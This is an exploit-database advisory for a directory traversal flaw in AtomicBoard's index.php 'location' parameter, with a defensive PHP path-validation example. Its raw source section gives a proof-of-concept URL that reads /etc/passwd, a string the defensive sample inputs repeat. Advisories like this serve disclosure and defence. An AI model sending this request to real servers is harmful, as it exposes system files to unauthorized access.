Vendor: AtomicBoard
By: SecurityFocus
CVSS: 7.5 (HIGH)
CWE: 22 (Directory Traversal)
Product Name: AtomicBoard
Affected Version From: 2000.6.2
Affected Version To: 2000.6.2
Patch Exists: NO
Related CWE: N/A
CPE: a:atomic_board:atomicboard
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

AtomicBoard Directory Traversal Vulnerability

It has been reported that attackers may be able to modify the 'location' variable passed to the index.php file to cause the Web server to return arbitrary files. This script is prone to a directory traversal vulnerability, allowing attackers to retrieve any file residing on the filesystem readable by the Web server user.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in file operations.
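
One way to apply this mitigation to a file-selecting parameter such as 'location', shown as an added example that is not AtomicBoard's code: the helper name `resolve_location`, the `pages` directory layout and the sample inputs are assumptions constructed for illustration. It canonicalizes the requested path and serves it only if the result stays inside the intended directory.

```php
<?php
// Added example (hypothetical helper, not taken from AtomicBoard).
// Maps a user-supplied 'location' value to a file inside $baseDir,
// or returns null when the request would leave that directory.
function resolve_location(string $baseDir, string $location): ?string
{
    // Empty values and embedded NUL bytes are never legitimate file names.
    if ($location === '' || strpos($location, "\0") !== false) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() resolves "..", "." and symlinks; it returns false if the path does not exist.
    $target = realpath($base . DIRECTORY_SEPARATOR . $location);
    if ($target === false || !is_file($target)) {
        return null;
    }
    // Compare canonical paths. The trailing separator keeps a sibling such as
    // "/srv/pages-old" from passing as a child of "/srv/pages".
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $target;
}

// Constructed demo tree: one servable page and one file outside the page directory.
$root  = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'ab_demo_' . bin2hex(random_bytes(4));
$pages = $root . DIRECTORY_SEPARATOR . 'pages';
mkdir($pages, 0700, true);
file_put_contents($pages . DIRECTORY_SEPARATOR . 'home.txt', "welcome\n");
file_put_contents($root . DIRECTORY_SEPARATOR . 'secret.txt', "outside\n");

// Constructed inputs, including the traversal string quoted in the advisory.
$samples = ['home.txt', './home.txt', '../secret.txt',
            '../../../../../../etc/passwd', '/etc/passwd', "home.txt\0.php", 'missing.txt'];
foreach ($samples as $s) {
    $resolved = resolve_location($pages, $s);
    printf("%-40s => %s\n", json_encode($s), $resolved === null ? 'rejected' : 'served');
}

// Remove the demo tree.
unlink($pages . DIRECTORY_SEPARATOR . 'home.txt');
unlink($root . DIRECTORY_SEPARATOR . 'secret.txt');
rmdir($pages);
rmdir($root);
```

Where the set of valid pages is small and fixed, an explicit allow-list of names is a stricter alternative to path canonicalization.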

Source:

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/8236/info

It has been reported that attackers may be able to modify the 'location' variable passed to the index.php file to cause the Web server to return arbitrary files. This script is prone to a directory traversal vulnerability, allowing attackers to retrieve any file residing on the filesystem readable by the Web server user.

http://www.example.com/atomicboard/index.php?location=../../../../../../etc/passwd

http://www.example.com/AtomicBoard-0.6.2/index.php?location=anything